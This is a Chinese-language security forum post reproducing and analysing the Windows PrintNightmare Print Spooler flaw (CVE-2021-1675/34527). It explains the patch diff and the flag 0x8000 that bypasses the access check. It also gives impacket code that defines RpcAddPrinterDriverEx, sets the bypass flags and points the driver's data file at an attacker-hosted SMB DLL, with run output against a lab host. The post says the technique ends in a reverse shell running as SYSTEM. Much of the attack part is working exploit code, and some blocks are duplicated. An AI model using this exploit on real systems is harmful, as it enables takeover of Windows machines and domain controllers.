-
-
[原创] Windows PrintNightmare 漏洞复现分析
-
发表于: 2022-1-21 11:13
-
Windows Print Spooler是打印后台处理服务,即管理所有本地和网络打印队列及控制所有打印工作。Windows Print Spooler 存在权限提升漏洞,经过身份认证的攻击者可利用此漏洞使 Spooler 服务加载恶意 DLL,从而获取权限提升。利用此漏洞需身份认证,攻击者可通过多种方式获得身份认证信息。在域环境中合适的条件下,未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在域控制器上执行任意代码,从而获得整个域的控制权。
尽管微软将 PrintNightmare 分配给了 CVE-2021-34527,笔者仍然认为它是 CVE-2021-1675 带来的远程代码执行相关的利用。首先进行补丁对比,比较明显的是 RpcAddPrinterDriverEx 函数,在调用 YAddPrinterDriverEx 函数前会进行判断,如果满足一定条件就对 dwFileCopyFlags 进行 &FFFF7FFF 处理,这样操作是为了取消 dwFileCopyFlags 中指定的 0x8000。
查看文档可知,0x00008000 代表 APD_INSTALL_WARNED_DRIVER,添加打印机驱动程序,即使它在服务器的警告打印机驱动程序列表中。那么下一步就是构造请求使 spooler 程序调用 RpcAddPrinterDriverEx 函数。
首先看一下有没有历史 POC,这样稍作修改就可以使用了。很快就找到了 printerbug.py,它是基于 impacket 写的,并且调用了 RpcOpenPrinter。但是看了下,impacket 中并没有实现 RpcAddPrinterDriverEx,于是参照 impacket.dcerpc.v5.rprn 中的格式,为 RpcAddPrinterDriverEx 添加了类,如下所示:
RpcAddPrinterDriverEx 函数的第二个参数类型 DRIVER_CONTAINER 有些复杂,但参考其他结构的格式很快就能为它写出定义代码:
接下来修改 printerbug.py,主要修改了 PrinterBug 类中的 lookup 函数(这里有一个坑,LPWSTR 这些字符串要以 \x00 结尾,不然会报 rpc_x_bad_stub_data 错误,之前就卡在这里了),如下:
在测试之前还需要在共享的机器上配置允许匿名共享,不然会报错,如下:
在 Windows 机器可以做如下配置:
如果攻击机是 Linux,可以搭建 SMB 服务,然后修改 /etc/samba/smb.conf & sudo service smbd start:
已经有很好的漏洞分析文章了,比如:https://www.freebuf.com/vuls/282023.html
下面不再啰嗦,只是简单记录一下自己想知道的点。
以下为微软文档给出的pName解释:
该参数是一个指向字符串的指针,该字符串指定了该方法所操作的打印服务器的名称。这必须是远程过程调用 (RPC) 绑定到的域名系统 (DNS)、 NetBIOS、 互联网协议版本 4 (IPv4)、互联网协议版本 6 (IPv6)或通用命名约定 (UNC)名称,并且它必须唯一标识网络上的打印服务器。
此参数通过 FindSpoolerByNameIncRef 函数进行检查,如果通过校验,则返回 pLocalIniSpooler。但如果校验失败就不会去执行 SplAddPrinterDriverEx 函数。
在这期间可能会执行 FindSpoolerByNameIncRef->FindSpoolerByName->FindSpooler->CheckMyName->CacheIsNameInNodeList->TNameResolutionCache::IsNameInNodeCache->TResolutionCacheNode::IsNameInNodeCache,直到匹配到一个 pName,如下所示:
以下代码说明 pName 可以为 NULL,在 FindSpoolerByName 函数中如果 pName 不以 "\\" 开头则被判定为 LocalIniSpooler。在 SplAddPrinterDriverEx 函数中还是会调用 MyName->CheckMyName,如果 pName 为 NULL 的话,也会返回 1,这样也可以通过校验。Python 版的 poc 里面 pName 的值就是 NULL。"\\" 也是可以的,可以自己调试一下。
继续看 localspl!SplAddPrinterDriverEx 函数,如果通过了 MyName 校验,会执行下面的代码,比较 dwFileCopyFlags 的第 0xF(15,从0开始索引) 是否被设置,如果设置了该比特位(我们已将其设置为 0x8014),就不会执行 v11 = 1 将 v11 置 1,因而在执行 if ( v11 && !(unsigned int)ValidateObjectAccess(0, 1, 0i64, 0i64, (__int64)pLocalIniSpooler, 0) ) 时,v11 还是 0,从而绕过 ValidateObjectAccess 函数的检查去执行 InternalAddPrinterDriverEx 函数。InternalAddPrinterDriverEx 函数执行完之后,Spooler 服务就会加载指定的 DriverFile 和 ConfigFile 模块,如下所示:
通过前面分析,我们已经有办法可以让 Spooler 服务加载指定 DLL,还是要试一下看它可不可以加载网络上的文件,这样影响将更大一些(本地变远程)。如果将 pConfigFile 直接设置为 UNC 路径(网络路径)会报错。这是因为在 InternalAddPrinterDriverEx 调用 ValidateDriverInfo 函数时会进行以下判断,如果 dwFileCopyFlags 设置了 0x10,pDriverPath 和 pConfigFile 必须是本地文件,否则就会产生 0x57 错误。
以下为调试时信息,可更加直观展示这一流程:
再来看一下文件操作吧,借助 Process Monitor 我们可以看到程序先在 C:\Windows\System32\spool\drivers\x64\3 路径下创建了 Old 和 New 文件夹。
将驱动文件复制到 C:\Windows\System32\spool\drivers\x64\3\New\ 文件夹下,同理 pConfigFile、pDataFile 也被复制进来。
当多次去调用 RpcAddPrinterDriverEx 函数时程序会进行以下操作:
将新的文件复制到 C:\Windows\System32\spool\drivers\x64\3\New\ 目录下
将 C:\Windows\System32\spool\drivers\x64\3 路径下的相关文件移动到 C:\Windows\System32\spool\drivers\x64\3\Old\1 ( 或 2、3……) ,然后将 C:\Windows\System32\spool\drivers\x64\3\New\ 目录下的相关文件移动到 C:\Windows\System32\spool\drivers\x64\3 路径下
然后加载 C:\Windows\System32\spool\drivers\x64\3 路径下的 pDriverPath 和 pConfigFile
这样我们在后面的请求中将 pConfigFile 设置为 C:\Windows\System32\spool\drivers\x64\3\Old\X\asd.dll,如下所示,Spooler 服务成功加载恶意 DLL,并反弹了 SHELL。
参考链接:
https://github.com/numanturle/PrintNightmare
https://www.freebuf.com/vuls/282023.html
https://mp.weixin.qq.com/s/iNOb6cBAfMwCm2AjqbdEvQ
https://mp.weixin.qq.com/s/8j4ylHr8ZDhlrWMAwhVcmQ
# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)class RpcAddPrinterDriverEx(NDRCALL):
opnum = 89
structure = (
('pName', STRING_HANDLE),
('pDriverContainer', DRIVER_CONTAINER),
('dwFileCopyFlags', DWORD),
)
class RpcAddPrinterDriverExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
def hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level=2):
request = RpcAddPrinterDriverEx()
request['pName'] = pName
request['pDriverContainer'] = DriverContainer
request['dwFileCopyFlags'] = flags
dce.request(request)
################################################################################# OPNUMs and their corresponding structures################################################################################OPNUMS = {
0 : (RpcEnumPrinters, RpcEnumPrintersResponse),
1 : (RpcOpenPrinter, RpcOpenPrinterResponse),
10 : (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
29 : (RpcClosePrinter, RpcClosePrinterResponse),
65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
89 : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}# 3.1.4.4.8 RpcAddPrinterDriverEx (Opnum 89)class RpcAddPrinterDriverEx(NDRCALL):
opnum = 89
structure = (
('pName', STRING_HANDLE),
('pDriverContainer', DRIVER_CONTAINER),
('dwFileCopyFlags', DWORD),
)
class RpcAddPrinterDriverExResponse(NDRCALL):
structure = (
('ErrorCode', ULONG),
)
def hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags, level=2):
request = RpcAddPrinterDriverEx()
request['pName'] = pName
request['pDriverContainer'] = DriverContainer
request['dwFileCopyFlags'] = flags
dce.request(request)
################################################################################# OPNUMs and their corresponding structures################################################################################OPNUMS = {
0 : (RpcEnumPrinters, RpcEnumPrintersResponse),
1 : (RpcOpenPrinter, RpcOpenPrinterResponse),
10 : (RpcEnumPrinterDrivers, RpcEnumPrinterDriversResponse),
29 : (RpcClosePrinter, RpcClosePrinterResponse),
65 : (RpcRemoteFindFirstPrinterChangeNotificationEx, RpcRemoteFindFirstPrinterChangeNotificationExResponse),
69 : (RpcOpenPrinterEx, RpcOpenPrinterExResponse),
89 : (RpcAddPrinterDriverEx, RpcAddPrinterDriverExResponse),
}##################################### MY ADD ####################################### 2.2.1.5.1 DRIVER_INFO_1class DRIVER_INFO_1(NDRSTRUCT):
structure = (
('notUsed',ULONGLONG),
)
class PDRIVER_INFO_1(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_1),
)
# 2.2.1.5.2 DRIVER_INFO_2class DRIVER_INFO_2(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
)
class PDRIVER_INFO_2(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_2),
)
# 2.2.1.5.3 RPC_DRIVER_INFO_3class RPC_DRIVER_INFO_3(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
)
class PRPC_DRIVER_INFO_3(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_3),
)
# 2.2.1.5.4 RPC_DRIVER_INFO_4class RPC_DRIVER_INFO_4(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
('cchPreviousNames',DWORD),
('pszzPreviousNames',LPWSTR),
)
class PRPC_DRIVER_INFO_4(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_4),
)
# 2.2.1.5.5 RPC_DRIVER_INFO_6class FILETIME(NDRSTRUCT):
structure = (
('dwLowDateTime',DWORD),
('dwHighDateTime',DWORD),
)class RPC_DRIVER_INFO_6(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
('cchPreviousNames',DWORD),
('pszzPreviousNames',LPWSTR),
('ftDriverDate',FILETIME),
('dwlDriverVersion',ULONGLONG),
('pMfgName',LPWSTR),
('pOEMUrl',LPWSTR),
('pHardwareID',LPWSTR),
('pProvider',LPWSTR),
)
class PRPC_DRIVER_INFO_6(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_6),
)
# 2.2.1.5.6 RPC_DRIVER_INFO_8class RPC_DRIVER_INFO_8(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
('cchPreviousNames',DWORD),
('pszzPreviousNames',LPWSTR),
('ftDriverDate',FILETIME),
('dwlDriverVersion',ULONGLONG),
('pMfgName',LPWSTR),
('pOEMUrl',LPWSTR),
('pHardwareID',LPWSTR),
('pProvider',LPWSTR),
('pPrintProcessor',LPWSTR),
('pVendorSetup',LPWSTR),
('cchColorProfiles',DWORD),
('pszzColorProfiles',LPWSTR),
('pInfPath',LPWSTR),
('dwPrinterDriverAttributes',DWORD),
('cchCoreDependencies',DWORD),
('ftMinInboxDriverVerDate',FILETIME),
('dwlMinInboxDriverVerVersion',ULONGLONG),
)
class PRPC_DRIVER_INFO_8(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_8),
)
# 2.2.1.2.3 DRIVER_CONTAINERclass Driver_Info_UNION(NDRUNION):
commonHdr = (
('tag', ULONG),
)
union = {
1 : ('pNotUsed', PDRIVER_INFO_1),
2 : ('Level2', PDRIVER_INFO_2),
3 : ('Level3', PRPC_DRIVER_INFO_3),
4 : ('Level4', PRPC_DRIVER_INFO_4),
5 : ('Level6', PRPC_DRIVER_INFO_6),
6 : ('Level8', PRPC_DRIVER_INFO_8),
}
class DRIVER_CONTAINER(NDRSTRUCT):
structure = (
('Level',DWORD),
('DriverInfo',Driver_Info_UNION),
)
##################################### MY ADD ####################################### 2.2.1.5.1 DRIVER_INFO_1class DRIVER_INFO_1(NDRSTRUCT):
structure = (
('notUsed',ULONGLONG),
)
class PDRIVER_INFO_1(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_1),
)
# 2.2.1.5.2 DRIVER_INFO_2class DRIVER_INFO_2(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
)
class PDRIVER_INFO_2(NDRPOINTER):
referent = (
('Data', DRIVER_INFO_2),
)
# 2.2.1.5.3 RPC_DRIVER_INFO_3class RPC_DRIVER_INFO_3(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
)
class PRPC_DRIVER_INFO_3(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_3),
)
# 2.2.1.5.4 RPC_DRIVER_INFO_4class RPC_DRIVER_INFO_4(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
('cchPreviousNames',DWORD),
('pszzPreviousNames',LPWSTR),
)
class PRPC_DRIVER_INFO_4(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_4),
)
# 2.2.1.5.5 RPC_DRIVER_INFO_6class FILETIME(NDRSTRUCT):
structure = (
('dwLowDateTime',DWORD),
('dwHighDateTime',DWORD),
)class RPC_DRIVER_INFO_6(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
('cchPreviousNames',DWORD),
('pszzPreviousNames',LPWSTR),
('ftDriverDate',FILETIME),
('dwlDriverVersion',ULONGLONG),
('pMfgName',LPWSTR),
('pOEMUrl',LPWSTR),
('pHardwareID',LPWSTR),
('pProvider',LPWSTR),
)
class PRPC_DRIVER_INFO_6(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_6),
)
# 2.2.1.5.6 RPC_DRIVER_INFO_8class RPC_DRIVER_INFO_8(NDRSTRUCT):
structure = (
('cVersion',DWORD),
('pName',LPWSTR),
('pEnvironment',LPWSTR),
('pDriverPath',LPWSTR),
('pDataFile',LPWSTR),
('pConfigFile',LPWSTR),
('pHelpFile',LPWSTR),
('pMonitorName',LPWSTR),
('pDefaultDataType',LPWSTR),
('cchDependentFiles',DWORD),
('pDependentFiles',LPWSTR),
('cchPreviousNames',DWORD),
('pszzPreviousNames',LPWSTR),
('ftDriverDate',FILETIME),
('dwlDriverVersion',ULONGLONG),
('pMfgName',LPWSTR),
('pOEMUrl',LPWSTR),
('pHardwareID',LPWSTR),
('pProvider',LPWSTR),
('pPrintProcessor',LPWSTR),
('pVendorSetup',LPWSTR),
('cchColorProfiles',DWORD),
('pszzColorProfiles',LPWSTR),
('pInfPath',LPWSTR),
('dwPrinterDriverAttributes',DWORD),
('cchCoreDependencies',DWORD),
('ftMinInboxDriverVerDate',FILETIME),
('dwlMinInboxDriverVerVersion',ULONGLONG),
)
class PRPC_DRIVER_INFO_8(NDRPOINTER):
referent = (
('Data', RPC_DRIVER_INFO_8),
)
# 2.2.1.2.3 DRIVER_CONTAINERclass Driver_Info_UNION(NDRUNION):
commonHdr = (
('tag', ULONG),
)
union = {
1 : ('pNotUsed', PDRIVER_INFO_1),
2 : ('Level2', PDRIVER_INFO_2),
3 : ('Level3', PRPC_DRIVER_INFO_3),
4 : ('Level4', PRPC_DRIVER_INFO_4),
5 : ('Level6', PRPC_DRIVER_INFO_6),
6 : ('Level8', PRPC_DRIVER_INFO_8),
}
class DRIVER_CONTAINER(NDRSTRUCT):
structure = (
('Level',DWORD),
('DriverInfo',Driver_Info_UNION),
)
#def lookup(self, rpctransport, host): level = 2
Driver_Info_Union = rprn.Driver_Info_UNION()
Driver_Info_Union['tag'] = level
DRIVER_INFO = Driver_Info_Union["Level"+str(level)]
DRIVER_INFO['cVersion'] = 3
DRIVER_INFO['pName'] = "Test printer\x00"
DRIVER_INFO['pEnvironment'] = "Windows x64\x00"
DRIVER_INFO['pDriverPath'] = pDriverPath
DRIVER_INFO['pDataFile'] = "\\\\{}\\smb\\asd.dll\x00".format(self.__attackerhost)
DRIVER_INFO['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
DriverContainer = rprn.DRIVER_CONTAINER()
DriverContainer['Level'] = level
DriverContainer['DriverInfo'] = Driver_Info_Union
#resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
print("[*] Attempting to call RpcAddPrinterDriverEx")
pName = NULL
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
resp = rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
#def lookup(self, rpctransport, host): level = 2
Driver_Info_Union = rprn.Driver_Info_UNION()
Driver_Info_Union['tag'] = level
DRIVER_INFO = Driver_Info_Union["Level"+str(level)]
DRIVER_INFO['cVersion'] = 3
DRIVER_INFO['pName'] = "Test printer\x00"
DRIVER_INFO['pEnvironment'] = "Windows x64\x00"
DRIVER_INFO['pDriverPath'] = pDriverPath
DRIVER_INFO['pDataFile'] = "\\\\{}\\smb\\asd.dll\x00".format(self.__attackerhost)
DRIVER_INFO['pConfigFile'] = "C:\\Windows\\System32\\winhttp.dll\x00"
DriverContainer = rprn.DRIVER_CONTAINER()
DriverContainer['Level'] = level
DriverContainer['DriverInfo'] = Driver_Info_Union
#resp = rprn.hRpcEnumPrinters(dce, rprn.PRINTER_ENUM_NAME)
print("[*] Attempting to call RpcAddPrinterDriverEx")
pName = NULL
flags = rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000
resp = rprn.hRpcAddPrinterDriverEx(dce, pName, DriverContainer, flags)
┌──(strawberry㉿kalilili)-[~]
└─$ python testprinter.py strawberry@192.168.140.222 192.168.140.144
[*] Impacket v0.9.24.dev1+20210618.54810.11f43043 - Copyright 2021 SecureAuth Corporation
Password:[*] Attempting to trigger authentication via rprn RPC at 192.168.140.222
[*] Bind OK
[*] Attempting to call RpcAddPrinterDriverEx ......
[-] Lookup Error: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.
┌──(strawberry㉿kalilili)-[~]
└─$ python testprinter.py strawberry@192.168.140.222 192.168.140.144
[*] Impacket v0.9.24.dev1+20210618.54810.11f43043 - Copyright 2021 SecureAuth Corporation
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
|
|
|---|---|
